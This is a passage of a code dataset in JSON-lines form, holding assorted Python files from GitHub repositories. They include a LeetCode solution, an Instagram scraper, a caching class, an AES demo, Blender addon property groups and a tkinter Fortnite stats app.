processed.\".format(\n count,\n len(total_galleries_filtered),\n gallery_data.title\n )\n )\n\n if gallery_data.thumbnail:\n original_thumbnail_url = gallery_data.thumbnail_url\n\n gallery_data.thumbnail_url = gallery_data.thumbnail\n\n gallery_instance = self.settings.gallery_model.objects.update_or_create_from_values(gallery_data)\n\n gallery_instance.thumbnail_url = original_thumbnail_url\n\n gallery_instance.save()\n else:\n self.settings.gallery_model.objects.update_or_create_from_values(gallery_data)\n","repo_name":"pandabuilder/pandachaika","sub_path":"core/base/parsers.py","file_name":"parsers.py","file_ext":"py","file_size_in_byte":36640,"program_lang":"python","lang":"en","doc_type":"code","stars":97,"dataset":"github-code","pt":"37"} +{"seq_id":"9656425631","text":"class Solution:\n def longestCommonPrefix(self, strs: List[str]) -> str:\n output = \"\"\n minLen = min([len(s) for s in strs])\n for idx in range(minLen):\n seqPreserved = False\n curChar = \"\"\n for s in strs:\n char = s[idx]\n # print(curChar)\n if len(curChar) != 0 and char == curChar:\n seqPreserved = True\n elif len(curChar) != 0 and char != curChar:\n seqPreserved = False\n break\n elif len(curChar) == 0:\n seqPreserved = True\n curChar = char\n else:\n break\n \n # print(curChar, seqPreserved, char, idx)\n if seqPreserved:\n output += curChar\n curChar = \"\"\n else:\n break\n # print()\n return output\n\n \n# 
Runtime: 41 ms, faster than 65.53% of Python3 online submissions for Longest Common Prefix.\n# Memory Usage: 14 MB, less than 80.10% of Python3 online submissions for Longest Common Prefix.","repo_name":"cphung3/leetcode-solutions","sub_path":"14. Longest Common Prefix.py","file_name":"14. Longest Common Prefix.py","file_ext":"py","file_size_in_byte":1157,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"34581766726","text":"import sys\nimport requests\n\"\"\"This is my script in the form of a command line script.\"\"\"\n\n\ndef get_user_data(json_file, argv):\n print('User data')\n user_status = json_file['graphql']['user']['biography']\n followers = json_file['graphql']['user']['edge_followed_by']['count']\n posts_number = json_file['graphql']['user']['edge_owner_to_timeline_media']['count']\n print(posts_number)\n\n\ndef get_post_data(json_file, argv):\n post_list = json_file['graphql']['user']['edge_owner_to_timeline_media']['edges']\n url = [f'https://www.instagram.com/{argv}/p/{post[\"node\"][\"shortcode\"]}' for post in post_list]\n likes = [post['node']['edge_liked_by'] for post in post_list]\n comment = [post['node']['edge_media_to_comment']['count'] for post in post_list]\n return print(comment)\n\n\ndef request_json(argv, arg):\n request = requests.get(f'https://www.instagram.com/{argv}/?__a=1')\n if request.status_code == 404:\n print('Username is invalid')\n else:\n json_file = request.json()\n if arg == 'get_post_data':\n return get_post_data(json_file, argv)\n elif arg == 'get_user_data':\n return get_user_data(json_file, argv)\n else:\n print('Wrong function input')\n\n\ndef main(argv=None):\n if argv is None:\n argv = str(sys.argv[1])\n arg = str(sys.argv[2])\n request_json(argv, arg)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"PTaHHHa/Instagram_PublicAPI_Scraper","sub_path":"command_line_script.py","file_name":"command_line_script.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
{"seq_id":"43549500331","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import make_interp_spline\n\n\ndef main():\n fig = plt.figure(figsize=(16, 8))\n spec = fig.add_gridspec(2, 4)\n\n # data[type][vertices]: [y]\n data = [\n [\n [326, 167, 119, 185], # 240\n [2806, 1322, 941, 1074], # 480\n [8863, 5111, 3431, 3619], # 720\n [21377, 11165, 7158, 8053] # 960\n ],\n [\n [240, 480, 720, 960, 1200, 1440, 1680, 1920, 2160, 2400, 2640, 2880],\n [5, 40, 162, 372, 727, 1263, 1987, 2962, 4208, 5772, 7729, 9981]\n ],\n ]\n\n for i in range(4):\n ax = fig.add_subplot(spec[0, i])\n ax.set_title(f'MPI N={240 * (i + 1)}')\n x = np.array([1, 2, 3, 4])\n y = np.array(data[0][i])\n\n X_Y_Spline = make_interp_spline(x, y)\n\n X_ = np.linspace(x.min(), x.max(), 500)\n Y_ = X_Y_Spline(X_)\n ax.plot(X_, Y_)\n ax.set_xlabel('M, threads')\n ax.set_ylabel('t, ms')\n\n ax = fig.add_subplot(spec[1, :])\n ax.set_title(f'CUDA')\n x = np.array(data[1][0])\n y = np.array(data[1][1])\n\n X_Y_Spline = make_interp_spline(x, y)\n\n X_ = np.linspace(x.min(), x.max(), 500)\n Y_ = X_Y_Spline(X_)\n ax.plot(X_, Y_)\n ax.set_xlabel('N, vertices')\n ax.set_ylabel('t, ms')\n\n plt.show()\n\n\nif __name__ == \"__main__\":\n 
main()\n","repo_name":"aminjonshermatov/distributed_data_processing","sub_path":"algorithm/plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"}
{"seq_id":"39714292018","text":"import bpy\r\nimport json\r\nfrom bpy.props import (BoolProperty, StringProperty, EnumProperty, FloatProperty, FloatVectorProperty, IntProperty, IntVectorProperty, CollectionProperty, PointerProperty) \r\nfrom . import _functions_\r\n\r\n# this is most of the settings in the armature that we require to set things back and forth... (i have removed many settings that rarely if ever get used)\r\nGrouping = {\r\n # all the object settings we might want...\r\n 'Object' : {\r\n 'Transform' : ['location', 'rotation_euler', 'rotation_quaternion', 'rotation_axis_angle', 'rotation_mode', 'scale', \r\n 'delta_location', 'delta_rotation_quaternion', 'delta_rotation_euler', 'delta_scale'],\r\n 'Relations' : ['parent', 'parent_type', 'parent_bone', 'track_axis', 'up_axis', 'pass_index'], \r\n 'Instancing': ['instance_type', 'show_instancer_for_viewport', 'show_instancer_for_render', \r\n 'use_instance_vertices_rotation', 'use_instance_faces_scale', 'instance_faces_scale'], \r\n 'Display' : ['show_name', 'show_axis', 'show_in_front', 'display_type', 'show_bounds', 'display_bounds_type']},\r\n # all the object data settings we might want... (pose and animation settings added here for convenience)\r\n 'Data' : {\r\n 'Skeleton' : ['pose_position', 'layers', 'layers_protected'],\r\n 'Pose' : ['bone_groups', 'pose_library', 'ik_solver', 'ik_param'],\r\n 'Animation' : ['action', 'use_nla', 'nla_tracks'],\r\n 'Display' : ['display_type', 'show_names', 'show_bone_custom_shapes', 'show_axes', 'show_group_colors']},\r\n # all the edit bone settings we might want... (used per bone)\r\n 'Edit Bone' : {\r\n 'Transform' : ['head', 'tail', 'roll', 'lock'],\r\n 'Bendy Bones' : ['bbone_segments', 'bbone_x', 'bbone_z', 'bbone_handle_type_start', 'bbone_custom_handle_start', \r\n 'bbone_handle_type_end', 'bbone_custom_handle_end', 'bbone_rollin', 'bbone_rollout', 'use_endroll_as_inroll',\r\n 'bbone_curveinx', 'bbone_curveiny', 'bbone_curveoutx', 'bbone_curveouty', 'bbone_easein', \r\n 'bbone_easeout', 'bbone_scaleinx', 'bbone_scaleiny', 'bbone_scaleoutx', 'bbone_scaleouty'],\r\n 'Relations' : ['parent', 'layers', 'use_connect', 'use_inherit_rotation', 'inherit_scale'],\r\n 'Deform' : ['use_deform', 'envelope_distance', 'envelope_weight', 'use_envelope_multiply', 'head_radius', 'tail_radius']},\r\n # all the pose bone settings we might want... 
(used per bone)\r\n 'Pose Bone' : {\r\n 'Posing' : ['location', 'lock_location', 'rotation_mode', 'rotation_quaternion', 'rotation_euler', \r\n 'rotation_axis_angle', 'lock_rotation_w', 'lock_rotation', 'scale', 'lock_scale'],\r\n 'Rigging' : ['constraints', 'drivers', 'bone_group'],\r\n 'IK Settings' : ['lock_ik_x', 'lock_ik_y', 'lock_ik_z', 'use_ik_limit_x', 'use_ik_limit_y', 'use_ik_limit_z', \r\n 'use_ik_rotation_control', 'use_ik_linear_control','ik_min_x', 'ik_max_x', 'ik_min_y', 'ik_max_y', 'ik_min_z', 'ik_max_z', \r\n 'ik_stiffness_x', 'ik_stiffness_y', 'ik_stiffness_z', 'ik_stretch', 'ik_rotation_weight', 'ik_linear_weight'],\r\n 'Display' : ['custom_shape', 'custom_shape_scale', 'use_custom_shape_bone_size', 'custom_shape_transform']},\r\n }\r\n\r\nPathing = {'Object' : \"bpy.data.objects\", 'Armature' : \"bpy.data.armatures\", 'Action' : \"bpy.data.actions\", \r\n 'Curve' : \"bpy.data.curves\", 'Edit Bone' : \"bpy.context.object.data.edit_bones\", 'Bone Group' : \"bpy.context.object.pose.bone_groups\"}\r\n\r\nclass JK_AES_Inherit(bpy.types.PropertyGroup):\r\n\r\n Type: EnumProperty(name=\"Type\", description=\"Type of property this boolean references\",\r\n items=[('BOOLEAN', \"Boolean\", \"\"), ('BOOLEAN_VECTOR', \"Boolean Vector\", \"\"), \r\n ('INTEGER', \"Integer\", \"\"), ('INTEGER_VECTOR', \"Integer Vector\", \"\"), \r\n ('FLOAT', \"Float\", \"\"), ('FLOAT_VECTOR', \"Float Vector\", \"\"),\r\n ('POINTER', \"Pointer\", \"\"), ('COLLECTION', \"Collection\", \"\")],\r\n default='BOOLEAN')\r\n\r\n Path: StringProperty(name=\"Path\", description=\"Path to this property. (if it's a pointer)\", default=\"\")\r\n \r\n Inherit: BoolProperty(name=\"Inherit\", description=\"Inherit this property value from parent stage\",\r\n default=True, options=set())\r\n\r\nclass JK_AES_Inherit_Group(bpy.types.PropertyGroup):\r\n \r\n Inherit: BoolProperty(name=\"Inherit\", description=\"Enable inheritance of this grouping\",\r\n default=False, options=set())\r\n\r\n Inheritance: CollectionProperty(type=JK_AES_Inherit)\r\n\r\nclass JK_AES_Inherit_Group_Bone(bpy.types.PropertyGroup):\r\n\r\n # collected edit bone inheritance...\r\n def Update_Edit_Bone_Inherit(self, context):\r\n if self.Edit_inherit:\r\n for group, props in Grouping['Edit Bone'].items():\r\n eb_grp = self.Edit_groups.add()\r\n eb_grp.name = group\r\n for prop in props:\r\n prop_iht = eb_grp.Inheritance.add()\r\n prop_iht.name = prop\r\n else:\r\n self.Edit_groups.clear()\r\n\r\n Edit_inherit: BoolProperty(name=\"Pull Edit Bone\", description=\"Inherit per bone edit mode settings from parent stage. (Head, Tail, Roll, etc)\",\r\n default=False, options=set(), update=Update_Edit_Bone_Inherit)\r\n \r\n Edit_groups: CollectionProperty(type=JK_AES_Inherit_Group)\r\n\r\n Edit_json: StringProperty(name=\"Edit Bone Dictionary\")\r\n\r\n # collected pose bone inheritance settings...\r\n def Update_Pose_Bone_Inherit(self, context):\r\n if self.Pose_inherit:\r\n for group, props in Grouping['Pose Bone'].items():\r\n pb_grp = self.Pose_groups.add()\r\n pb_grp.name = group\r\n for prop in props:\r\n prop_iht = pb_grp.Inheritance.add()\r\n prop_iht.name = prop\r\n else:\r\n self.Pose_groups.clear()\r\n\r\n Pose_inherit: BoolProperty(name=\"Pull Pose Bones\", description=\"Inherit per bone pose mode settings from parent stage. 
(Constraints, Drivers, etc)\",\r\n default=False, options=set(), update=Update_Pose_Bone_Inherit)\r\n \r\n Pose_groups: CollectionProperty(type=JK_AES_Inherit_Group)\r\n\r\n Pose_json: StringProperty(name=\"Pose Bone Dictionary\")\r\n\r\nclass JK_AES_Stage_Props(bpy.types.PropertyGroup):\r\n\r\n Armature: StringProperty(name=\"Armature\", description=\"Armature that defines this stage\", \r\n default=\"\", maxlen=1024)\r\n\r\n Is_source: BoolProperty(name=\"Is Source\", description=\"This is the source armature, there can only be one\",\r\n default=False, options=set())\r\n\r\n Show_details: BoolProperty(name=\"Show details\", description=\"Show pull settings for this stage\",\r\n default=False, options=set())\r\n \r\n Parent: StringProperty(name=\"Parent Stage\", description=\"The stage before this one\", \r\n default=\"\", maxlen=1024)\r\n\r\n # object inheritance...\r\n def Update_Object_Inherit(self, context):\r\n if self.Object_inherit:\r\n for group, props in Grouping['Object'].items():\r\n obj_grp = self.Object_groups.add()\r\n obj_grp.name = group\r\n for prop in props:\r\n prop_iht = obj_grp.Inheritance.add()\r\n prop_iht.name = prop\r\n else:\r\n self.Object_groups.clear()\r\n\r\n Object_inherit: BoolProperty(name=\"Pull Object\", description=\"Inherit object settings from parent stage. (NLA Strips, Pose Mode, Transforms, etc)\",\r\n default=False, options=set(), update=Update_Object_Inherit)\r\n\r\n Object_groups: CollectionProperty(type=JK_AES_Inherit_Group)\r\n\r\n Object_json: StringProperty(name=\"Object Dictionary\")\r\n \r\n # data inheritance...\r\n def Update_Data_Inherit(self, context):\r\n if self.Data_inherit:\r\n for group, props in Grouping['Data'].items():\r\n dat_grp = self.Data_groups.add()\r\n dat_grp.name = group\r\n for prop in props:\r\n prop_iht = dat_grp.Inheritance.add()\r\n prop_iht.name = prop\r\n else:\r\n self.Data_groups.clear()\r\n\r\n Data_inherit: BoolProperty(name=\"Pull Data\", description=\"Inherit data settings from parent stage. (Layers, Bone Groups, etc)\",\r\n default=False, options=set(), update=Update_Data_Inherit)\r\n\r\n Data_groups: CollectionProperty(type=JK_AES_Inherit_Group)\r\n\r\n Data_json: StringProperty(name=\"Data Dictionary\")\r\n \r\n # bone inheritance...\r\n Bones_inherit: BoolProperty(name=\"Pull Bones\", description=\"Inherit per bone edit mode settings from parent stage. 
(Head, Tail, Roll, etc)\",\r\n default=False, options=set())\r\n\r\n Bones: CollectionProperty(type=JK_AES_Inherit_Group_Bone)\r\n\r\n # addon data that might need saving per stage...\r\n Addon_json: StringProperty(name=\"Addon Dictionary\")\r\n\r\nclass JK_AES_Armature_Props(bpy.types.PropertyGroup):\r\n\r\n def Update_Stage(self, context):\r\n armature = bpy.context.object\r\n # lets not do anything silly like run a heap of code when we don't need to...\r\n if self.Stage != self.Last:\r\n last_mode = armature.mode\r\n if last_mode != 'OBJECT':\r\n bpy.ops.object.mode_set(mode='OBJECT')\r\n # save the properties of the current stage\r\n _functions_.Get_Stage_Properties(armature, self.Stages[self.Last])\r\n # the pull the inheritance hierarchy to the stage we are going to...\r\n _functions_.Pull_Hierarchy_Inheritance(armature, self.Stages[self.Stage])\r\n # then set the armature to the stage we are going to...\r\n _functions_.Set_Stage_Properties(armature, self.Stages[self.Stage])\r\n # set the last stage to the new stage...\r\n self.Last = self.Stage\r\n # and return the mode if we need to...\r\n if armature.mode != last_mode:\r\n bpy.ops.object.mode_set(mode=last_mode)\r\n \r\n Last: StringProperty(name=\"Last\", description=\"The stage we are coming from\", \r\n default=\"\", maxlen=1024)\r\n \r\n Stage: StringProperty(name=\"Stage\", description=\"The stage we are on\", \r\n default=\"\", maxlen=1024, update=Update_Stage, options={'ANIMATABLE'})\r\n \r\n Stages: CollectionProperty(type=JK_AES_Stage_Props, options=set())","repo_name":"Jim-Kroovy/B.L.E.N.D","sub_path":"BLEND-ArmatureEditingStages/_properties_.py","file_name":"_properties_.py","file_ext":"py","file_size_in_byte":10294,"program_lang":"python","lang":"en","doc_type":"code","stars":100,"dataset":"github-code","pt":"37"} +{"seq_id":"5119366789","text":"#!/usr/bin/python3\n\"\"\" LIFO is amazing! 
\"\"\"\nfrom base_caching import BaseCaching\n\n\nclass LIFOCache(BaseCaching):\n \"\"\"\n A class LIFOCache that inherits from BaseCaching and is a caching system\n \"\"\"\n def __init__(self):\n super().__init__()\n self.last_key = ''\n\n def put(self, key, item):\n \"\"\" Put new staff on self.cache_items \"\"\"\n if key and item:\n self.cache_data.update({key: item})\n if len(self.cache_data) > self.MAX_ITEMS:\n print(f\"DISCARD: {self.last_key}\")\n self.cache_data.pop(self.last_key)\n self.last_key = key\n\n def get(self, key):\n \"\"\" Get a specific item from self.cache_data \"\"\"\n if key:\n return self.cache_data.get(key)\n","repo_name":"WololoRC/holbertonschool-web_back_end","sub_path":"caching/2-lifo_cache.py","file_name":"2-lifo_cache.py","file_ext":"py","file_size_in_byte":768,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"29920628874","text":"from Crypto.Cipher import AES\n\n# need 16 bytes for each of these\nkey = b\"TheNeuralNineKey\"\nnonce = b\"TheNeuralNineNce\"\n\ncipher = AES.new(key, AES.MODE_EAX, nonce)\nciphertext = cipher.encrypt(b\"Hellow Workd!\")\n\nprint(ciphertext)\n\ncipher = AES.new(key, AES.MODE_EAX, nonce)\nprint(cipher.decrypt(ciphertext))","repo_name":"jb-williams/python_programs","sub_path":"NeuralNineTutorials/encryptedFileXfer/generate_key.py","file_name":"generate_key.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"721141555","text":"import sys, subprocess, pickle, os, json, logging, socket\nimport logging.config\nimport datetime\n\nfrom . import info\n\ndef getRunDir():\n return os.path.dirname(os.path.realpath(sys.argv[0]))\n\ndef setup_logger(logging_ini):\n if logging_ini is not None:\n print(\"Using custom logger\")\n else:\n logging_ini = os.path.join(info.CONFIGS, 'logging.ini')\n\n logging.config.fileConfig(logging_ini)\n logger = logging.getLogger(__name__)\n logger.info(\"**************************************************\")\n logger.info(datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M\"))\n logger.info(\"Host: \" + str(socket.gethostname()))\n logger.info(\"Screen: \" + os.getenv(\"STY\", \"unknown\"))\n logger.info(\"PWD: \" + os.getenv(\"PWD\", \"unknown\"))\n logger.info(\"Cmd: \" + str(sys.argv))\n logger.info(\"**************************************************\")\n\ndef to_bool(obj):\n if str(obj).lower() in [\"true\", \"1\"]:\n return True\n elif str(obj).lower() in [\"false\", \"0\"]:\n return False\n else:\n raise Exception(\"to_bool: cannot convert to bool\")\n\ndef line_with_arg(line):\n line = line.strip()\n return line is not \"\" and not line.startswith(\"#\")\n\ndef parse_conv_spec(conv_spec, batch_size):\n # \"1x29x29:100,5x5,p2x2:200,4x4,p2x2,f\"\n conv_spec = conv_spec.replace('X', 'x')\n structure = conv_spec.split(':')\n conv_layer_configs = []\n for i in range(1, len(structure)):\n config = {}\n elements = structure[i].split(',')\n if i == 1:\n input_dims = structure[i - 1].split('x')\n prev_map_number = int(input_dims[0])\n prev_feat_dim_x = int(input_dims[1])\n prev_feat_dim_y = int(input_dims[2])\n else:\n prev_map_number = conv_layer_configs[-1]['output_shape'][1]\n prev_feat_dim_x = conv_layer_configs[-1]['output_shape'][2]\n prev_feat_dim_y = conv_layer_configs[-1]['output_shape'][3]\n\n current_map_number = int(elements[0])\n filter_xy = elements[1].split('x')\n filter_size_x = int(filter_xy[0])\n filter_size_y = int(filter_xy[1])\n pool_xy 
= elements[2].replace('p','').replace('P','').split('x')\n pool_size_x = int(pool_xy[0])\n pool_size_y = int(pool_xy[1])\n output_dim_x = (prev_feat_dim_x - filter_size_x + 1) / pool_size_x\n output_dim_y = (prev_feat_dim_y - filter_size_y + 1) / pool_size_y\n\n config['input_shape'] = (batch_size, prev_map_number, prev_feat_dim_x, prev_feat_dim_y)\n config['filter_shape'] = (current_map_number, prev_map_number, filter_size_x, filter_size_y)\n config['poolsize'] = (pool_size_x, pool_size_y)\n config['output_shape'] = (batch_size, current_map_number, output_dim_x, output_dim_y)\n if len(elements) == 4 and elements[3] == 'f':\n config['flatten'] = True\n else:\n config['flatten'] = False\n\n conv_layer_configs.append(config)\n return conv_layer_configs\n\ndef _relu(x):\n return x * (x > 0)\n\ndef _capped_relu(x):\n return T.minimum(x * (x > 0), 6)\n\ndef _linear(x):\n return x * 1.0\n\ndef parse_activation(act_str):\n print(\"***\", act_str)\n if act_str == 'sigmoid':\n return T.nnet.sigmoid\n elif act_str == 'tanh':\n return T.tanh\n elif act_str == 'relu':\n return _relu\n elif act_str == 'capped_relu':\n return _capped_relu\n elif act_str == 'linear':\n return _linear\n return T.nnet.sigmoid\n\ndef activation_to_txt(act_func):\n if act_func == T.nnet.sigmoid:\n return 'sigmoid'\n if act_func == T.tanh:\n return 'tanh'\n\ndef parse_two_integers(argument_str):\n elements = argument_str.split(\":\")\n int_strs = elements[1].split(\",\")\n return int(int_strs[0]), int(int_strs[1])\n\n\"\"\"\nUsage:\n command = 'mysqladmin create test -uroot -pmysqladmin12'\n for line in run_command(command):\n print(line)\n\"\"\"\ndef run_command(command):\n fnull = open(os.devnull, 'w')\n p = subprocess.Popen(command,\n stdout=subprocess.PIPE,\n stderr=fnull,\n shell=True)\n return p, iter(p.stdout.readline, b'')\n\ndef pickle_load(filename):\n f = open(filename, \"rb\")\n try:\n obj = pickle.load(f)\n except Exception:\n f.close()\n f = open(filename, \"rb\")\n print(\"Not a pickled file... 
try to load as text format: \" + filename)\n obj = json.load(f)\n f.close()\n return obj\n\ndef pickle_save(obj, filename):\n f = open(filename + \".new\", \"wb\")\n pickle.dump(obj, f)\n f.close()\n os.rename(filename + \".new\", filename)\n\ndef makedirs(path):\n if not os.path.exists(path):\n os.makedirs(path)\n\ndef kahan_add(total, carry, inc):\n cs = T.add_no_assoc(carry, inc)\n s = T.add_no_assoc(total, cs)\n update_carry = T.sub(cs, T.sub(s, total))\n update_total = s\n return update_total, update_carry\n","repo_name":"hpi-xnor/BMXNet","sub_path":"example/speech-demo/io_func/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4921,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"} +{"seq_id":"71778942187","text":"# create global variable\nglobal keyword_dict\nglobal top_20_list\nglobal keyword_order\n\n\"\"\"\n# keyword_dict: record all keyword with count number\n# top_20_list: record top 20 searched keyword since launched\n# keyword_order: record all keywords in first appearance order,\n# this_keyword_order: record keyword in first appearance order, reset every time new phrase is searched\n# this_keyword_dict: record this keywords with count number\n\"\"\"\nkeyword_dict = {}\ntop_20_list = []\nkeyword_order = []\nthis_keyword_order = []\nthis_keyword_dict = {}\n\n\ndef handle_input(search_string):\n # store search result into result history\n parse_search_input(search_string)\n # acquire top 20 count in searched order\n top_20_keyword()\n # sort top 20 in order of count\n insertion_sort()\n # reverse top 20 keyword\n top_20_list.reverse()\n\n\ndef parse_search_input(search_string):\n # reset for new input\n this_keyword_order[:] = []\n this_keyword_dict.clear()\n\n # convert input string into lowercase letter\n # break the string into list of word and record to total_keywords\n search_string = search_string.lower()\n search_keywords = search_string.split()\n\n # find number of times each keyword being searched\n for word in search_keywords:\n # this search's keyword\n if word not in this_keyword_dict:\n # add word and initial (1) count into dictionary of all searched keys since launched\n this_keyword_dict[word] = 1\n # add word into order list to record search order\n # total keyword\n if word not in this_keyword_order:\n this_keyword_order.append(word)\n else:\n # increment the count of the searched keyword\n this_keyword_dict[word] += 1\n\n # all\n if word not in keyword_dict:\n # add word and initial (1) count into dictionary of all searched keys since launched\n keyword_dict[word] = 1\n # add word into order list to record search order\n # total keyword\n if word not in keyword_order:\n keyword_order.append(word)\n else:\n # increment the count of the searched keyword\n keyword_dict[word] += 1\n\n\ndef insertion_sort():\n for i in range(1, len(top_20_list)):\n cur_word = top_20_list[i]\n pos = i\n # compare against the saved cur_word: top_20_list[i] is overwritten while shifting\n while pos > 0 and keyword_dict[top_20_list[pos - 1]] > keyword_dict[cur_word]:\n top_20_list[pos] = top_20_list[pos - 1]\n pos = pos - 1\n top_20_list[pos] = cur_word\n\n\n# compute top 20 count keywords\ndef top_20_keyword():\n # delete old result\n top_20_list[:] = []\n # loop through all keyword since launched\n for word in keyword_order:\n if len(top_20_list) < 20:\n # add keyword to top20list if the list is not full (contain 20 elements) despite the frequency count\n top_20_list.append(word)\n else:\n # find the minimum frequency count in the current top20list\n min_top20 = top_20_list[0]\n for word_top20 
in top_20_list:\n # if word_top20 count is lesser than the current min count then update min\n if keyword_dict[word_top20] < keyword_dict[min_top20]:\n min_top20 = word_top20\n # compare min count keyword in top 20 list and the current word in all search\n # remove min count keyword if current word is greater and replace with new keyword\n if keyword_dict[min_top20] < keyword_dict[word]:\n top_20_list.remove(min_top20)\n top_20_list.append(word)\n","repo_name":"moGrans/Team-noob-Web-Project","sub_path":"old code/keyword_history.py","file_name":"keyword_history.py","file_ext":"py","file_size_in_byte":3625,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31295907361","text":"from torchtext import data\n\nfrom fastai.nlp import *\n\n\n\nPATH = 'data/aclImdb/'\n\n\n\nTRN_PATH = 'train/all/'\n\nVAL_PATH = 'test/all/'\n\nTRN = f'{PATH}{TRN_PATH}'\n\nVAL = f'{PATH}{VAL_PATH}'\n\n\n\nTEXT = data.Field(lower=True, tokenize=\"spacy\")\n\n\n\nbs = 64\n\nbptt = 70\n\n\n\nFILES = dict(train=TRN_PATH, validation=VAL_PATH, test=VAL_PATH)\n\nmd = LanguageModelData.from_text_files(PATH, TEXT, **FILES, bs=bs, bptt=bptt, min_freq=10)\n\n\n\nwith open(\"md.pkl\", \"wb\") as file:\n\n pickle.dump(md, file)\n","repo_name":"dycforever/program","sub_path":"pytorch/sentiment/t.py","file_name":"t.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38453166219","text":"import tkinter\nfrom tkinter import messagebox\nfrom PIL import ImageTk, Image\nimport configparser\nimport requests\nimport webbrowser\n\n\n# Load configuration file with API keys\nConfig = configparser.ConfigParser()\nConfig.read('tokens.ini')\n# Tracker Network\nTRN_key = Config.get('Tokens', 'trn-api-key')\nHEADERS = {'TRN-Api-Key': TRN_key}\n\n\nclass MainWindow(tkinter.Tk):\n def __init__(self):\n super().__init__()\n self.player_stats = {}\n # Window settings\n self.title(\"Fortnite Stats\")\n self.geometry('515x380')\n self.resizable(False, False)\n # Title Appearance Options\n TITLE_COLOR = 'MediumPurple3'\n TITLE_TEXT_COLOR = 'Black'\n # Stat Appearance Options\n STAT_BG_COLOR = 'DodgerBlue2'\n STAT_FG_COLOR = 'white'\n STAT_CATAGORY_FONT = 'Arial 12 bold'\n STAT_VALUE_FONT = 'Arial 12'\n\n # Title Bar Frame\n title_bar_frame = tkinter.Frame(self)\n title_bar_frame.pack(fill='x')\n title_bar_frame.configure(background=TITLE_COLOR)\n # Logo\n self.logo = ImageTk.PhotoImage(Image.open('fortnite-logo.png'))\n\n tkinter.Label(title_bar_frame, image=self.logo, bg=TITLE_COLOR).grid(row=0, column=0, rowspan=2)\n program_title = tkinter.Label(title_bar_frame, text='FORTNITE Stat Tracker', bg=TITLE_COLOR, fg=TITLE_TEXT_COLOR)\n program_title.grid(row=0, column=1)\n program_title.configure(font='Arial 26 bold underline')\n\n #API Credits\n api_credits = tkinter.Label(title_bar_frame, text='Powered By: Fortnitetracker.com', bg=TITLE_COLOR, fg=TITLE_TEXT_COLOR)\n api_credits.grid(row=1, column=1)\n api_credits.configure(font='Arial 18 bold')\n api_credits.bind(\"<Button-1>\", self.tracker_page)\n\n # Lifetime Stat frame\n stat_frame = tkinter.Frame(self)\n stat_frame.pack(fill='x')\n stat_frame.configure(bg=STAT_BG_COLOR)\n stat_frame.columnconfigure(2, weight=1)\n\n # Check Boxes\n tkinter.Checkbutton(stat_frame, text='Solo', command=self.solo_player_stats, activebackground=STAT_BG_COLOR, activeforeground=STAT_FG_COLOR, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR, font=STAT_CATAGORY_FONT).grid(row=0, 
column=3)\n tkinter.Checkbutton(stat_frame, text='Duo', command=self.duo_player_stats, activebackground=STAT_BG_COLOR, activeforeground=STAT_FG_COLOR, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR, font=STAT_CATAGORY_FONT).grid(row=0, column=4)\n tkinter.Checkbutton(stat_frame, text='Squad', command=self.squad_player_stats, activebackground=STAT_BG_COLOR, activeforeground=STAT_FG_COLOR, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR, font=STAT_CATAGORY_FONT).grid(row=0, column=5, sticky='w')\n\n # Account label\n self.account_name = tkinter.StringVar()\n tkinter.Label(stat_frame, text='Account:', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=0, column=0, sticky='e')\n tkinter.Label(stat_frame, textvariable=self.account_name, font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=0, column=1, sticky='w')\n\n # Platform label\n self.platform = tkinter.StringVar()\n self.platform.set('PC')\n tkinter.Label(stat_frame, text='Platform:', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=1, column=0, sticky='e')\n tkinter.Label(stat_frame, textvariable=self.platform, font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=1, column=1, sticky='w')\n\n # Entry Box\n self.user = tkinter.StringVar()\n self.search_button = tkinter.Button(stat_frame, text='Search')\n self.search_button.grid(row=1, column=3, sticky='we')\n self.search_button.bind('<Button-1>', self.solo_player_stats)\n\n self.entry = tkinter.Entry(stat_frame, textvariable=self.user)\n self.entry.insert(0, 'Enter Username')\n self.entry.grid(row=1, column=4, sticky='w')\n\n #######################\n # Lifetime Stats #\n #######################\n # Lifetime title label\n tkinter.Label(stat_frame, text='==Lifetime Stats==', font=('Arial', 14, 'bold'), bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=2, column=1, columnspan=3, sticky='ew')\n\n # Win label\n self.wins = tkinter.StringVar()\n tkinter.Label(stat_frame, text='Wins: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=3, column=0, sticky='e')\n tkinter.Label(stat_frame, textvariable=self.wins, font=STAT_VALUE_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=3, column=1, sticky='w')\n\n # Matches Played Label\n self.matches_played = tkinter.StringVar()\n tkinter.Label(stat_frame, text='Matches Played: ', font=STAT_CATAGORY_FONT, bg=STAT_BG_COLOR, fg=STAT_FG_COLOR).grid(row=4, column=0, sticky='e')\n tkinter.Label(stat_frame, textvariable=self.matches_played, 